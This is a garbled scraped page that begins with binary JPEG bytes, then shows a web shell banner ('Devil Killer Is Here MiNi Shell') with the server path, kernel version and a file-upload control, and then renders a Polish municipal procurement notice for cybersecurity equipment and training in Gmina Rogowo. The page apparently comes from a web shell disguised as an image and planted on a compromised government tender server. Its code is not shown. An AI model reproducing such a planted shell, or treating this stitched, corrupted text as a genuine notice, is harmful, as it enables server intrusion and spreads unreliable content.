JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241108/0058540501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP SPRZĘTU ORAZ USŁUG W RAMACH PROJEKTU GRANTOWEGO – WZMOCNIENIE SYSTEMÓW CYBERBEZPIECZEŃSTWA W GMINIE ROGOWO W RAMACH REALIZACJI PROJEKTU <br/>„CYBERBEZPIECZNY SAMORZĄD” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ROGOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092351216</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">KOŚCIELNA</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rogowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(052) 30-24-053 lub (052) 30-24-077</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(052)30-24-275</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">inwestycje@rogowo.paluki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rogowo.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP SPRZĘTU ORAZ USŁUG W RAMACH PROJEKTU GRANTOWEGO – WZMOCNIENIE SYSTEMÓW CYBERBEZPIECZEŃSTWA W GMINIE ROGOWO W RAMACH REALIZACJI PROJEKTU <br/>„CYBERBEZPIECZNY SAMORZĄD” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1864c935-7d1d-4fbf-b552-1538a61b0222</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00585405</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00094300/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup sprzętu oraz usług w ramach projektu grantowego – wzmocnienie systemów cyberbezpieczeństwa w gminie Rogowo w ramach realizacji projektu „Cyberbezpieczny Samorząd”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Cyberbezpieczny Samorząd” w ramach Projektu Cyberbezpieczny Samorząd realizowanego w ramach Funduszy Europejskich na Rozwój Cyfrowy 2021-2027 (FERC) Priorytet II: Zaawansowane usługi cyfrowe, Działanie 2.2. – Wzmocnienie krajowego systemu cyberbezpieczeństwa. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/rogowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem Platformy.<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między Zamawiającym a Wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były w formie elektronicznej za pośrednictwem<br/>Platformy i formularza „Wyślij wiadomość do zamawiającego”. Zamawiający będzie przekazywał Wykonawcom informacje w formie<br/>elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu<br/>składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji Komunikaty”. Postępowanie prowadzone jest w<br/>formie elektronicznej za pośrednictwem Platformy pod adresem:https://platformazakupowa.pl/pn/rogowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na Platformie, tj.: 1.1. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>1.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza<br/>wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 1.3. zainstalowana dowolna<br/>przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., 1.4. łączona obsługa JavaScript, 1.5.<br/>zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf, 1.6. Szyfrowanie na Platformie odbywa się<br/>za pomocą protokołu TLS 1.3. 1.7. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Oferta składana jest w formie elektronicznej opatrzonej podpisem kwalifikowanym lub w postaci elektronicznej opatrzonej odpisem<br/>zaufanym lub podpisem osobistym.<br/>3. W procesie składania oferty na Platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca<br/>może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez Platformę) oraz<br/>dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty (po kliknięciu w przycisk Przejdź do<br/>podsumowania).<br/>4. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy. Informacje<br/>dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał<br/>na platformie w sekcji „Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem<br/>jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy do konkretnego Wykonawcy.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/rogowo</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny RODO szczegółowo opisany w Rozdziale 30 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIDiGP.271.1.9.2024.ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	przeprowadzenie szkolenia dla działu IT (szkolenie dot. UTM),<br/>Szkolenie z zakresu urządzenia klasy UTM wdrażanego w ramach projektu (Cześć I Obszar techniczny, pkt. 1. UTM Unified Threat Management: wznowienie supportu dla Urzędu Gminy w Rogowie oraz pkt. 2. UTM Unified Threat Management: urządzenie klasy UTM dla Ośrodka Pomocy Społecznej w Rogowie, 2 osoby formuła online,<br/>2)	przeprowadzenie szkolenia dla działu IT (szkolenie Microsoft Active Directory), <br/>Szkolenie dla działu IT dotyczące usługi katalogowej systemów Windows Server (Microsoft Active Directory) dla Urzędu Gminy w Rogowie dla 2 osób, formuła online,<br/>3)	przeprowadzenie dla pracowników szkolenia spoza działu IT (cyberbezpieczeństwo),<br/>Szkolenie dla pracowników spoza działu IT (cyberbezpieczeństwo) - szkolenie dla pracowników Urzędu Gminy (1 grupa, 30 osób, szkolenie online). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80533100-0 - Usługi szkolenia komputerowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W zakresie Zadania nr 1:<br/>(C) Cena – 100%<br/>Kryterium „Cena (C)” będzie rozpatrywana na podstawie ceny jednostkowej ofertowej podanej przez Wykonawcę w formularzu<br/>ofertowym i zostanie przyporządkowana proporcjonalnie liczba punktów.<br/>cena – 100% (100 pkt.) liczone wg wzoru:<br/>C = (Cmin / Cb) x 100 x 100%<br/>gdzie:<br/>C – ilość punktów przyznana w kryterium „Cena”<br/>Cmin – najniższa cena w złożonych ofertach<br/>Cb – cena badanej oferty<br/>100 – wskaźnik stały<br/>100% – procentowe znaczenie kryterium „Cena”<br/>Maksymalna ilość punktów do otrzymania – 100,00 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	UTM Unified Threat Management: wznowienie suportu;<br/>b)	UTM Unified Threat Management: urządzenie klasy UTM;<br/>c)	Serwer dla Urzędu Gminy;<br/>d)	Serwer dla Gminnego Ośrodka Pomocy Społecznej;<br/>e)	Network Attached Storage NAS: macierz NAS wraz z dyskami dla Urzędu Gminy; <br/>f)	Network Attached Storage NAS: macierz NAS wraz z dyskami dla Gminnego Ośrodka Pomocy Społecznej;<br/>g)	Generator prądu: Agregat prądotwórczy;<br/>h)	UPS stanowiskowy: UPS dla Urzędu Gminy;<br/>i)	UPS stanowiskowy: UPS dla Gminnego Ośrodka Pomocy Społecznej;<br/>j)	UPS do serwera dla Urzędu Gminy;<br/>k)	UPS do serwera dla Gminnego Ośrodka Pomocy Społecznej;<br/>l)	Zarządzalne Urządzenia sieciowe z obsługą VLAN, MACsec, standardu 802.1X. Przełącznik zarządzalny dla Urzędu Gminy;<br/>m)	Biblioteka taśmowa dla Urzędu Gminy;<br/>n)	Oprogramowanie antywirusowe: Oprogramowanie antywirusowe z EDR dla Urzędu Gminy;<br/>o)	Oprogramowanie antywirusowe: Oprogramowanie antywirusowe dla telefonów dla Urzędu Gminy;<br/>p)	Oprogramowanie antywirusowe: Oprogramowanie antywirusowe dla Gminnego Ośrodka Pomocy Społecznej;<br/>q)	Oprogramowanie do wykonywania kopii zapasowych dla Urzędu Gminy;<br/>r)	Oprogramowanie do wykonywania kopii zapasowych dla Gminnego Ośrodka Pomocy Społecznej;<br/>s)	Oprogramowanie SIEM (Security Information and Event Management) dla Urzędu Gminy;<br/>t)	Oprogramowanie przeciwdziałającemu wyciekowi danych DLP - Data Leak Prevention dla Urzędu Gminy i Gminnego Ośrodka Pomocy Społecznej;<br/>u)	Oprogramowanie do monitorowania infrastruktury informatycznej dla Urzędu Gminy;<br/>v)	Usługi informatyczne: wdrożenie systemu monitorowania środowiska serwerowego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48900000-7 - Różne pakiety oprogramowania i systemy komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48761000-0 - Pakiety oprogramowania antywirusowego</p> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W zakresie Zadania nr 2:<br/>1. Najkorzystniejszą ofertą będzie oferta, która przedstawia najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do<br/>przedmiotu zamówienia publicznego.<br/>2. Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>Cena - 60%<br/>Okres gwarancji na oprogramowanie - 20%<br/>Okres gwarancji na sprzęt komputerowy - 20%<br/>3. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>CENA<br/>Cm<br/>C = -------------- x 100 x 60%<br/>Cb<br/>C - otrzymana ilość punktów w kryterium ceny<br/>Cm - najniższa oferowana cena spośród ofert<br/>Cb - cena badanej oferty<br/>OKRES GWARANCJI NA OPROGRAMOWANIE<br/>Gb<br/>G1 = -------------- x 100 x 20%<br/>Gn<br/>G1 - otrzymana ilość punktów w kryterium okres gwarancji na oprogramowanie<br/>Gb - okres gwarancji na oprogramowanie liczony w miesiącach w ofercie badanej<br/>Gn - okres gwarancji na oprogramowanie liczony w miesiącach najdłuższy spośród ofert<br/>OKRES GWARANCJI NA SPRZĘT KOMPUTEROWY<br/>Gb<br/>G2 = -------------- x 100 x 20%<br/>Gn<br/>G2 - otrzymana ilość punktów w kryterium okres gwarancji na sprzęt komputerowy<br/>Gb - okres gwarancji na sprzęt komputerowy liczony w miesiącach w ofercie badanej<br/>Gn - okres gwarancji na sprzęt komputerowy liczony w miesiącach<br/>najdłuższy spośród ofert<br/>Ocena = C + G1 + G2, gdzie:<br/>C - liczba punktów dla kryterium cena<br/>G1 - liczba punktów dla kryterium okres gwarancji na oprogramowanie<br/>G2 - liczba punktów dla kryterium okres gwarancji na sprzęt komputerowy<br/>Ogłoszenie nr 2024/BZP 00524448/01 z dnia 2024-10-01<br/>2024-10-01 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>4. Zamawiający określa minimalny okres gwarancji:<br/>a) oprogramowanie - 12 miesięcy, natomiast maksymalny na 24 miesiące.<br/>b) na sprzęt komputerowy - 12 miesięcy, natomiast maksymalny na 36 miesięcy.<br/>5. Ocenie podlegać będzie gwarancja ponad wymagane minimum.<br/>a) Oferta z najdłuższym okresem gwarancji na sprzęt komputerowy (jednak nie krótszym niż 12 miesiące i nie dłuższym niż 36<br/>miesięcy) = 20 punktów a oprogramowanie (jednak nie krótszym niż 12 miesiące i nie dłuższym niż 24 miesięcy) = 20 punktów,<br/>b) Zaoferowanie gwarancji na oprogramowanie równej wymaganemu minimum (12 miesięcy) spowoduje nieprzyznanie żadnego<br/>punktu w tym kryterium,<br/>c) Zaoferowanie gwarancji na sprzęt komputerowy równej wymaganemu minimum (12 miesięcy) spowoduje nieprzyznanie żadnego<br/>punktu w tym kryterium,<br/>d) Zaoferowanie gwarancji na sprzęt komputerowy równej 36 miesięcy lub powyżej spowoduje przyznanie 20 punktów w tym<br/>kryterium,<br/>e) Zaoferowanie gwarancji na oprogramowanie równej 24 miesiące lub powyżej spowoduje przyznanie 20 punktów w tym kryterium,<br/>f) Zaoferowanie gwarancji poniżej wymaganego minimum spowoduje odrzucenie oferty zgodnie z art. 226 ust. 1 pkt 5 ustawy,<br/>g) Nie wpisanie okresu gwarancji w formularzu ofertowym spowoduje odrzucenie oferty zgodnie z art. 226 ust. 1 pkt 5 ustawy,<br/>h) Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na oprogramowanie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na sprzęt komputerowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>6.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1.	zdolności do występowania w obrocie gospodarczym<br/>nie dotyczy<br/>2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>nie dotyczy<br/>3.	sytuacji ekonomicznej lub finansowej:<br/>nie dotyczy<br/>4.	zdolności technicznej lub zawodowej (dot. 2 części zamówienia):<br/>W celu potwierdzenia warunku Wykonawca winien wykazać:<br/>a)	Wykonawca wykaże zamówienia wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie: <br/>1)	minimum 1 zamówienie na dostawę rozwiązań z zakresu sprzętu serwerowego przy czym w skład rozwiązań wchodził minimum serwer, Network Attached Storage, UPS, zarządzalne urządzenie sieciowe oraz wdrożenie wyżej wymienionych elementów.<br/>2)	minimum 2 zamówienia o wartości co najmniej 100 000,00 zł brutto każde, na dostawę sprzętu komputerowego rozumianego jako serwer lub/i Network Attached Storage lub/i UPS lub/i zarządzalne urządzenia sieciowe.<br/>3)	minimum 2 zamówienia na 